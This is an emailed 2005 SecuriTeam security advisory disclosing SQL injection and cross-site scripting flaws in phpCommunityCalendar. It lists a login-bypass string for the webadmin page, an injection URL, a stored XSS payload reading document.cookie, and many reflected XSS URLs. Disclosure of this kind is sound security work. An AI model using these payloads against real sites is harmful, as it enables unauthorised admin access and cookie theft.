From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 7 Sep 2005 12:29:56 +0200
Subject: [UNIX] phpCommunityCalendar Vulnerable to SQL Injections and Cross Site Scripting Attacks
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050907095642.618D45833@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
phpCommunityCalendar Vulnerable to SQL Injections and Cross Site Scripting
Attacks
------------------------------------------------------------------------
SUMMARY
<http://open.appideas.com/Calendar/>; phpCommunityCalendar allows "you to
build an online calendar interface that would integrate into your web
site". Multiple SQL injection vulnerabilities and cross site scripting
attacks can be launched against the phpCommunityCalendar as the product
doesn't do enough to filter out malicious content.
DETAILS
SQL Injection / Login bypass:
The "admin" directory contains tools for the site administrator. While the
"webadmin" contains tools for category administrators. If magic quotes off
a user can bypass category admin check modifying sql login query, example:
go to http://[target]/[path]/webadmin/login.php and use the following for
the authentication credentials:
login: ' or isnull(1/0) /*
password: [nothing here]
Now you can add, delete, modify events,
SQL Injection:
The following URL will trigger a MySQL error, as the original statement
being sent to the SQL server is altered by the user provided data:
http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/*
Cross site scripting:
Adding an event and filling with something like this:
\'\);</script><script>alert(document.cookie)</script>
Will cause the client run the above JavaScript whenever the event is
watched.
The following is a list of URLs that can be also used to trigger cross
site scripting vulnerabilities:
http://[target]/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>
http://[target]/[path]/calDaily.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calMonthly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calWeekly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calYearly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/day.php?font="><script>alert('LOL')</script><!--
http://[target]/[path]/day.php?LocationID="><script>alert('LOL')</script><!--
http://[target]/[path]/event.php?font="><script>alert('LOL')</script>
http://[target]/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
http://[target]/[path]/event.php?Contact=<script>alert('LOL')</script>
http://[target]/[path]/event.php?Description=<script>alert('LOL')</script>
http://[target]/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
http://[target]/[path]/week.php?font="><script>alert('LOL')</script>
ADDITIONAL INFORMATION
The information has been provided by <mailto:retrogod@aliceposta.it.>
rgod.
The original article can be found at:
<http://www.rgod.altervista.org/phpccal.html>;
http://www.rgod.altervista.org/phpccal.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
